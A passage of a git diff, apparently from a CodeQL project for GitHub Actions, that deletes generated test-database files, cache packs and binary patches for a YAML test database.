ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFront-12309985#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TAccessPathFrontOp-ea156098#1#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-0bf03857#1#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#1#b delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#2# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode delete mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode#0#e delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/02.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/04.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/1f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/29.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/32.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/46.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/91.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/95.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a4.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ab.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/bd.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ce.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/d0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack.d delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/df.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e4.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e6.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/pages/fc.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/01.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/03.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/06.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/09.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/10.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/1f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/20.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/24.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/25.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/26.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/28.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2a.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/32.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/36.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/3c.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/43.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/45.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/57.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/59.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5a.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/60.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/66.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6c.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/74.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/75.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/78.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/83.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/86.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/8d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/96.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/98.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/99.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/9f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a8.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a9.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bd.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bf.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c5.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c9.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ca.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d2.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d5.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/dc.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/de.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/df.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e4.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ef.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f8.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f9.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ff.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/07.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/10.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/14.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/18.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/19.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1e.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/28.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/2f.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/39.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/47.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/4d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/52.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/56.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/59.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5d.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/6a.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/80.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/85.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/8b.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/aa.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ac.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/c1.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ca.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/cc.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d0.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d5.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/relations/da.pack delete mode 100644 ql/src/test-db/db-yaml/default/cache/version delete mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel delete mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/files.rel delete mode 100644 ql/src/test-db/db-yaml/default/files.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/folders.rel delete mode 100644 ql/src/test-db/db-yaml/default/folders.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel delete mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/0/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/info delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/1/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/pools/poolInfo delete mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel delete mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/strings/0/buckets/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 delete mode 100644 ql/src/test-db/db-yaml/default/strings/0/pageDump/page-000000000 delete mode 100644 ql/src/test-db/db-yaml/default/yaml.rel delete mode 100644 ql/src/test-db/db-yaml/default/yaml.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel delete mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum delete mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel delete mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel.checksum delete mode 100755 ql/src/test-db/db-yaml/yaml.dbscheme delete mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091753.298Z.json delete mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091754.191Z.json delete mode 100644 ql/src/test-db/log/database-create-20240203.101751.644.log delete mode 100644 ql/src/test-db/log/database-index-files-20240203.101752.962.log delete mode 100644 ql/src/test-db/src.zip diff --git a/ql/lib/test-db/baseline-info.json b/ql/lib/test-db/baseline-info.json deleted file mode 100644 index 9e26dfeeb6e..00000000000 --- a/ql/lib/test-db/baseline-info.json +++ /dev/null @@ -1 +0,0 @@ -{} \ No newline at end of file diff --git a/ql/lib/test-db/codeql-database.yml b/ql/lib/test-db/codeql-database.yml deleted file mode 100644 index 887a8daf4c1..00000000000 --- a/ql/lib/test-db/codeql-database.yml +++ /dev/null @@ -1,10 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -creationMetadata: - cliVersion: 2.16.1 - creationTime: 2024-02-03T09:17:54.858204Z -finalised: true diff --git a/ql/lib/test-db/db-yaml/default/cache/.lock b/ql/lib/test-db/db-yaml/default/cache/.lock deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info deleted file mode 100644 index 9c1ea6cdeb296b714876d0e928d9978e9ec788c9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 